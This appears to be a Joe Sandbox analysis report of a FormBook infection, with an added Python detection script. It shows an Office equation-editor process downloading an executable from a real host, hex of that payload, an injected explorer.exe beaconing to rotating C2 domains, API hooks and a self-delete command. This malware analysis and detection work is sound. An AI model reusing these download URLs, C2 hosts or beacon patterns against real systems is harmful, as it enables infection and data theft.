                                        Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta http-equiv="content-type" content="text/html;charset=utf-8" /> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon" /> <title>Forbidden</title> </head> <body> <h1>Access Forbidden</h1> </body></html>


                                        Session ID: 3    Source: 192.168.2.22:49167    Destination: 103.150.181.71:80    PID: 1244    Process: C:\Windows\explorer.exe
                                        Timestamp    kBytes transferred    Direction    Data
                                        Nov 21, 2023 13:27:36.955003023 CET    365    OUT    GET /t2ti/?4hO02rc=7DxIxXtD0cmaaH8JRCp3g1LIg+NFO3IPyGr0LK1dljwtKxPhU92HBtbpaOBLFPespYq5Bw==&ll=NdqLMf HTTP/1.1
                                        Host: www.xazeyu.net
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Nov 21, 2023 13:27:41.824326038 CET    365    OUT    GET /t2ti/?4hO02rc=7DxIxXtD0cmaaH8JRCp3g1LIg+NFO3IPyGr0LK1dljwtKxPhU92HBtbpaOBLFPespYq5Bw==&ll=NdqLMf HTTP/1.1
                                        Host: www.xazeyu.net
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Nov 21, 2023 13:27:51.543101072 CET    365    OUT    GET /t2ti/?4hO02rc=7DxIxXtD0cmaaH8JRCp3g1LIg+NFO3IPyGr0LK1dljwtKxPhU92HBtbpaOBLFPespYq5Bw==&ll=NdqLMf HTTP/1.1
                                        Host: www.xazeyu.net
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Nov 21, 2023 13:28:10.996438980 CET    366    OUT    GET /t2ti/?4hO02rc=7DxIxXtD0cmaaH8JRCp3g1LIg+NFO3IPyGr0LK1dljwtKxPhU92HBtbpaOBLFPespYq5Bw==&ll=NdqLMf HTTP/1.1
                                        Host: www.xazeyu.net
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Nov 21, 2023 13:28:30.511953115 CET    366    OUT    GET /t2ti/?4hO02rc=7DxIxXtD0cmaaH8JRCp3g1LIg+NFO3IPyGr0LK1dljwtKxPhU92HBtbpaOBLFPespYq5Bw==&ll=NdqLMf HTTP/1.1
                                        Host: www.xazeyu.net
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Nov 21, 2023 13:28:49.980819941 CET    366    OUT    GET /t2ti/?4hO02rc=7DxIxXtD0cmaaH8JRCp3g1LIg+NFO3IPyGr0LK1dljwtKxPhU92HBtbpaOBLFPespYq5Bw==&ll=NdqLMf HTTP/1.1
                                        Host: www.xazeyu.net
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Nov 21, 2023 13:29:28.871623993 CET    367    OUT    GET /t2ti/?4hO02rc=7DxIxXtD0cmaaH8JRCp3g1LIg+NFO3IPyGr0LK1dljwtKxPhU92HBtbpaOBLFPespYq5Bw==&ll=NdqLMf HTTP/1.1
                                        Host: www.xazeyu.net
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
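Taken together, the sessions above show the two network behaviours worth alerting on for this sample: an Office equation-editor process (EQNEDT32.EXE, PID 1668) fetching balokarat2.1.exe, and the injected explorer.exe (PID 1244) sending the same GET /t2ti/?...&ll=NdqLMf request, with Connection: close and a seven-null-byte body, to three unrelated hosts in turn. The Python below is an added example written for this page; it is not part of the Joe Sandbox report and not a vendor rule. It runs those two checks over records constructed from the captured requests. The record layout, the rule names, the length thresholds and the benign iexplore.exe control record are assumptions of the example, not FormBook internals.

```python
"""Added example, not part of the Joe Sandbox report: two network checks that
the HTTP sessions in this capture trip. The records below are constructed from
the captured requests; the record layout, rule names, thresholds and the benign
control record are my own assumptions, not Joe Sandbox or FormBook internals."""
import re
from collections import defaultdict
from dataclasses import dataclass, field
from typing import Optional
from urllib.parse import urlsplit

OFFICE_PROCS = {"eqnedt32.exe", "winword.exe", "excel.exe", "powerpnt.exe"}
BASE64ISH = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")


@dataclass
class HttpRecord:
    process: str                  # image path of the process that sent the request
    host: str                     # Host header
    target: str                   # request-target exactly as on the request line
    req_headers: dict
    req_body: bytes = b""
    status: Optional[int] = None  # None: no response was ever seen
    resp_headers: dict = field(default_factory=dict)
    resp_body: bytes = b""


def _image(process: str) -> str:
    return process.rsplit("\\", 1)[-1].lower()


def office_http_hits(records):
    """An Office component speaking HTTP at all is an alert; a PE body (MZ
    magic or application/octet-stream) escalates it to a payload download."""
    hits = []
    for r in records:
        proc = _image(r.process)
        if proc not in OFFICE_PROCS:
            continue
        ctype = r.resp_headers.get("Content-Type", "").lower()
        is_pe = r.resp_body.startswith(b"MZ") or ctype.startswith("application/octet-stream")
        hits.append(("office-pe-download" if is_pe else "office-http", proc, r.host, r.target))
    return hits


def beacon_groups(records, min_hosts=2):
    """Domain rotation as in sessions 1-3: one process sends GETs with a fixed
    path, one opaque base64-like blob, one short constant parameter and
    Connection: close to several unrelated hosts, the body being null padding
    at most. Returns {(image, path, short_param): sorted hosts}."""
    groups = defaultdict(set)
    for r in records:
        parts = urlsplit(r.target)
        # split by hand: parse_qsl would turn a '+' inside the blob into a space
        values = [kv.partition("=")[2] for kv in parts.query.split("&") if kv]
        blob = [v for v in values if BASE64ISH.match(v)]
        short = [v for v in values if 4 <= len(v) <= 8 and v.isalnum()]
        if not (blob and short):
            continue
        if r.req_headers.get("Connection", "").lower() != "close":
            continue
        if r.req_body.strip(b"\x00"):
            continue  # a real body means this is not the padded beacon
        groups[(_image(r.process), parts.path, short[0])].add(r.host)
    return {k: sorted(v) for k, v in groups.items() if len(v) >= min_hosts}


EQN = r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
EXPL = r"C:\Windows\explorer.exe"
DROP = "/wp-content/uploads/wpr-addons/forms/balokarat2.1.exe"

# Constructed from the report's sessions 0-3 and the HTTPS session; bodies are
# cut down to what the rules inspect. The last record is a made-up benign control.
CAPTURE = [
    HttpRecord(EQN, "swamini.in", DROP, {"Connection": "Keep-Alive"}, status=301,
               resp_headers={"Content-Type": "text/html; charset=UTF-8"},
               resp_body=b"<head><title>Document Moved</title></head>"),
    HttpRecord(EQN, "swamini.in", DROP, {"Connection": "Keep-Alive"}, status=200,
               resp_headers={"Content-Type": "application/octet-stream",
                             "Content-Length": "345522"},
               resp_body=b"MZ\x90\x00\x03\x00\x00\x00"),
    HttpRecord(EXPL, "www.shucaimh.com",
               "/t2ti/?4hO02rc=giwc8XVj/AkHwdj5caWP9R2rVnZav6a8h1CJcH9em0U/x824OxogtA/AOr9gMChFXFyvXA==&ll=NdqLMf",
               {"Connection": "close"}, b"\x00" * 7, status=200,
               resp_headers={"Content-Type": "text/html;charset=utf-8"}),
    HttpRecord(EXPL, "www.6061k.vip",
               "/t2ti/?ll=NdqLMf&4hO02rc=qDIrkJK7+k7t2cKm0yqLDiQOFM/oPqsB85v8vrvlTOlWprVZbJOF5qoRsr2uTLTXyB6S3g==",
               {"Connection": "close"}, b"\x00" * 7, status=403),
    HttpRecord(EXPL, "www.xazeyu.net",
               "/t2ti/?4hO02rc=7DxIxXtD0cmaaH8JRCp3g1LIg+NFO3IPyGr0LK1dljwtKxPhU92HBtbpaOBLFPespYq5Bw==&ll=NdqLMf",
               {"Connection": "close"}, b"\x00" * 7),  # retried repeatedly, never answered
    HttpRecord(r"C:\Program Files\Internet Explorer\iexplore.exe", "example.com",
               "/index.html?q=weather&page=2", {"Connection": "Keep-Alive"}, status=200,
               resp_headers={"Content-Type": "text/html"}),
]

if __name__ == "__main__":
    for hit in office_http_hits(CAPTURE):
        print("ALERT", *hit)
    for key, hosts in beacon_groups(CAPTURE).items():
        print("ALERT beacon-rotation", key, hosts)
```

Grouping on (process image, path, short constant parameter) rather than on the host is what lets the second rule survive the domain rotation: the constant that stays visible across all three sessions is ll=NdqLMf, while the long 4hO02rc blob differs per host. Run the file directly to print the two office alerts and the one rotation group.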


                                        Session ID: 0    Source: 192.168.2.22:49162    Destination: 103.224.247.210:443    PID: 1668    Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        Timestamp    kBytes transferred    Direction    Data
                                        2023-11-21 12:25:56 UTC    0    OUT    GET /wp-content/uploads/wpr-addons/forms/balokarat2.1.exe HTTP/1.1
                                        Accept: */*
                                        Accept-Encoding: gzip, deflate
                                        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                        Connection: Keep-Alive
                                        Host: swamini.in
                                        2023-11-21 12:25:57 UTC    0    IN    HTTP/1.1 200 OK
                                        Content-Type: application/octet-stream
                                        Last-Modified: Tue, 21 Nov 2023 10:13:50 GMT
                                        Accept-Ranges: bytes
                                        ETag: "7ee53f6c631cda1:0"
                                        Server: Microsoft-IIS/8.5
                                        X-Powered-By: ASP.NET
                                        X-Powered-By-Plesk: PleskWin
                                        Strict-Transport-Security: max-age=15768000; includeSubDomains
                                        Date: Tue, 21 Nov 2023 12:25:54 GMT
                                        Connection: close
                                        Content-Length: 345522
                                        2023-11-21 12:25:57 UTC    0    IN    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 30 28 81 e9 51 46 d2 e9 51 46 d2 e9 51 46 d2 2a 5e 19 d2 eb 51 46 d2 e9 51 47 d2 71 51 46 d2 2a 5e 1b d2 e6 51 46 d2 bd 72 76 d2 e3 51 46 d2 2e 57 40 d2 e8 51 46 d2 52 69 63 68 e9 51 46 d2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 65 3a ff 56 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5c 00 00 00 d6 01 00 00 04 00 00 fb 30 00 00 00 10 00 00 00 70 00 00 00 00 40
                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$0(QFQFQF*^QFQGqQF*^QFrvQF.W@QFRichQFPELe:V\0p@
                                        2023-11-21 12:25:57 UTC16INData Raw: 08 04 00 00 0f 85 d2 00 00 00 f6 05 59 3f 42 00 02 75 76 39 45 0c 74 09 8b 4d 14 83 79 08 fe 75 68 33 c9 39 45 0c 0f 95 c1 51 ff 75 fc e8 9b fc ff ff 3b c7 7c 53 8b c8 69 c9 18 04 00 00 8d 54 19 08 8b 0a f6 c1 10 75 40 f6 c1 40 74 14 81 f1 80 00 00 00 84 c9 79 05 83 c9 01 eb 08 83 e1 fe eb 03 83 f1 01 50 89 0a e8 8a c6 ff ff a1 58 3f 42 00 33 c9 f7 d0 41 c7 45 0c 0f 04 00 00 c1 e8 08 23 c1 89 4d 10 89 45 14 39 7d f4 74 4e 8b 45 f4 81 78 08 6e fe ff ff 75 0e ff 70 5c 57 68 19 04 00 00 ff 75 fc ff d6 8b 45 f4 81 78 08 6a fe ff ff 75 28 83 78 0c 02 75 12 8b 40 5c 69 c0 18 04 00 00 8d 44 18 08 83 08 20 eb 10 8b 40 5c 69 c0 18 04 00 00 8d 5c 18 08 83 23 df 81 7d 0c 11 01 00 00 75 72 66 81 7d 10 f9 03 0f 85 48 02 00 00 8b 45 10 c1 e8 10 66 3d 01 00 0f 85 38 02
                                        Data Ascii: Y?Buv9EtMyuh39EQu;|SiTu@@tyPX?B3AE#ME9}tNExnup\WhuExju(xu@\iD @\i\#}urf}HEf=8
                                        2023-11-21 12:25:58 UTC32INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00
                                        Data Ascii:
                                        2023-11-21 12:25:58 UTC48INData Raw: 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 ff 00 00 00 ff 00 00 00 ff 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                        Data Ascii:
                                        2023-11-21 12:25:58 UTC64INData Raw: ee ce 9a 0c 90 09 7c 39 b1 7f 99 4b da fe 93 df 8a 39 fe de e3 7a 6a d4 98 6d 42 84 51 4f cb f7 4e 43 e9 e7 11 5e f6 01 90 a7 c6 d8 00 76 8b 2c e7 46 2f 28 71 18 e4 0c 63 e9 28 ee b0 65 e7 a6 c1 3f 4b c7 b2 5b 97 b3 da 98 e4 ec 6c 05 b8 13 97 76 80 7b 34 4e d7 c8 0d ef 50 bf 7c c6 80 fb 7c 4c 00 e7 f6 20 30 a1 ff 59 04 3c 11 3a eb b3 a8 92 d7 38 6a 90 55 bc ef bb 7e 9b 81 9d 9c 0e 59 26 ff 14 59 e4 ac 98 88 b6 a9 f8 36 b2 c4 7d 0b 0e c7 cd 62 97 ab 00 b4 0b b7 57 e1 1e 4d 43 14 c5 24 41 c8 0d f1 21 b8 e9 bd 4a 3d 14 48 ca 22 ab 2d 59 a6 5a 44 ad e7 ad f3 af 04 35 0c 69 07 cd 3f 9e 5c 38 74 40 6d e5 c9 27 58 ea 8f e6 61 0b cb 51 df 45 d1 fc c0 04 5d 1e e1 ed 09 75 a0 01 e8 62 cb e2 8d 19 49 a6 4e d5 5a cd e5 fa 88 da be c9 24 e9 c9 fc 0d e9 a1 1f 56 70 1b
                                        Data Ascii: |9K9zjmBQONC^v,F/(qc(e?K[lv{4NP||L 0Y<:8jU~Y&Y6}bWMC$A!J=H"-YZD5i?\8t@m'XaQE]ubINZ$Vp
                                        2023-11-21 12:25:58 UTC80INData Raw: 41 36 69 a3 b1 a0 c1 52 7a ca fb 46 46 90 ba 5d 28 cb 68 53 1c 2a 5a d0 00 7e f4 9c 36 d0 57 dd 61 c8 16 27 65 a7 8d c6 2b fa 69 43 9a 70 7f 4a 93 e0 14 d0 b5 58 f5 d0 73 3e bf e2 aa cd 13 c6 a9 6f 26 e2 76 32 85 9a ef 62 13 ba 58 b9 fc 0a 92 26 02 1b a5 b8 a7 49 33 ce e2 6e d2 74 72 13 c9 da 08 19 32 60 df b9 be 2e da 2f 8f 16 c2 d5 c0 45 cb 00 5d db d7 fd 22 6e f8 cb 90 18 63 c5 53 b4 93 db b1 c5 fa 30 57 2c 4c 84 c0 39 f6 72 27 74 d5 f4 b2 79 6c 64 9d c2 cf 5c b9 0b e3 53 89 b5 be 6c 35 dd 41 af 65 c6 41 e1 f6 e3 18 91 fa d0 d2 bf 39 39 1a 23 d5 83 dc 06 63 24 64 10 a3 08 6d cb 83 1a 58 9f cc 40 10 38 ae ab 5e 93 4e 2a 97 50 fb 10 56 59 ec eb 0d c0 c1 57 35 03 5b 86 73 2c 02 6c 41 bd a0 e1 b1 d9 43 37 a0 84 8e 5b ab 93 ad e0 46 07 dc ec 7e 1e 66 7e 7b
                                        Data Ascii: A6iRzFF](hS*Z~6Wa'e+iCpJXs>o&v2bX&I3ntr2`./E]"ncS0W,L9r'tyld\Sl5AeA99#c$dmX@8^N*PVYW5[s,lAC7[F~f~{


                                        Code Manipulations

                                        Function Name   Hook Type   Active in Processes
                                        PeekMessageA    INLINE      explorer.exe
                                        PeekMessageW    INLINE      explorer.exe
                                        GetMessageW     INLINE      explorer.exe
                                        GetMessageA     INLINE      explorer.exe

                                        Function Name   Hook Type   New Data
                                        PeekMessageA    INLINE      0x48 0x8B 0xB8 0x8C 0xCE 0xEF
                                        PeekMessageW    INLINE      0x48 0x8B 0xB8 0x84 0x4E 0xEF
                                        GetMessageW     INLINE      0x48 0x8B 0xB8 0x84 0x4E 0xEF
                                        GetMessageA     INLINE      0x48 0x8B 0xB8 0x8C 0xCE 0xEF

                                        Target ID:0
                                        Start time:13:25:51
                                        Start date:21/11/2023
                                        Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                        Imagebase:0x13f930000
                                        File size:1'423'704 bytes
                                        MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:false

                                        Target ID:2
                                        Start time:13:25:52
                                        Start date:21/11/2023
                                        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                        Imagebase:0x400000
                                        File size:543'304 bytes
                                        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:5
                                        Start time:13:25:57
                                        Start date:21/11/2023
                                        Path:C:\Users\user\AppData\Roaming\word.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\AppData\Roaming\word.exe
                                        Imagebase:0x400000
                                        File size:345'522 bytes
                                        MD5 hash:B08C02AB269D1406728178E62017C3D4
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        Target ID:6
                                        Start time:13:25:57
                                        Start date:21/11/2023
                                        Path:C:\Users\user\AppData\Local\Temp\twbcaze.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Local\Temp\twbcaze.exe"
                                        Imagebase:0x400000
                                        File size:203'776 bytes
                                        MD5 hash:9C416E56B341D900E2DFEC7595CC85EE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.353559991.0000000000250000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.353559991.0000000000250000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.353559991.0000000000250000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.353559991.0000000000250000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.353559991.0000000000250000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_NSISDropper, Description: Yara detected NSISDropper, Source: 00000006.00000002.353557579.0000000000230000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_NSISDropper, Description: Yara detected NSISDropper, Source: 00000006.00000002.353583167.0000000000430000.00000004.00000001.01000000.00000006.sdmp, Author: Joe Security
                                        Antivirus matches:
                                        • Detection: 100%, Joe Sandbox ML
                                        Reputation:low
                                        Has exited:true

                                        Target ID:7
                                        Start time:13:25:58
                                        Start date:21/11/2023
                                        Path:C:\Users\user\AppData\Local\Temp\twbcaze.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\AppData\Local\Temp\twbcaze.exe
                                        Imagebase:0x400000
                                        File size:203'776 bytes
                                        MD5 hash:9C416E56B341D900E2DFEC7595CC85EE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.363149838.0000000000260000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.363149838.0000000000260000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.363149838.0000000000260000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.363149838.0000000000260000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.363149838.0000000000260000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.363182622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.363178353.00000000003D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.363178353.00000000003D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.363178353.00000000003D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.363178353.00000000003D0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.363178353.00000000003D0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:low
                                        Has exited:true

                                        Target ID:8
                                        Start time:13:25:58
                                        Start date:21/11/2023
                                        Path:C:\Windows\explorer.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\Explorer.EXE
                                        Imagebase:0xff2f0000
                                        File size:3'229'696 bytes
                                        MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 00000008.00000002.881171114.0000000008CBE000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                        Reputation:high
                                        Has exited:false

                                        Target ID:9
                                        Start time:13:26:00
                                        Start date:21/11/2023
                                        Path:C:\Windows\SysWOW64\cmstp.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Windows\SysWOW64\cmstp.exe
                                        Imagebase:0xd0000
                                        File size:84'992 bytes
                                        MD5 hash:00263CA2071DC9A6EE577EB356B0D1D9
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.879277529.00000000001A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.879277529.00000000001A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.879277529.00000000001A0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.879277529.00000000001A0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.879277529.00000000001A0000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.879264468.0000000000170000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.879264468.0000000000170000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.879264468.0000000000170000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.879264468.0000000000170000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.879264468.0000000000170000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.879241310.0000000000090000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:moderate
                                        Has exited:false

                                        Target ID:10
                                        Start time:13:26:03
                                        Start date:21/11/2023
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:/c del "C:\Users\user\AppData\Local\Temp\twbcaze.exe"
                                        Imagebase:0x4a4f0000
                                        File size:302'592 bytes
                                        MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:12
                                        Start time:13:26:17
                                        Start date:21/11/2023
                                        Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                        Imagebase:0x400000
                                        File size:543'304 bytes
                                        MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:false
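
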